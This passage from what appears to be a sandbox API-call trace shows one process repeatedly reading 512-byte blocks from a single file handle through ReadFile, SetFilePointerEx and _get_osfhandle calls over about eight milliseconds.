lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 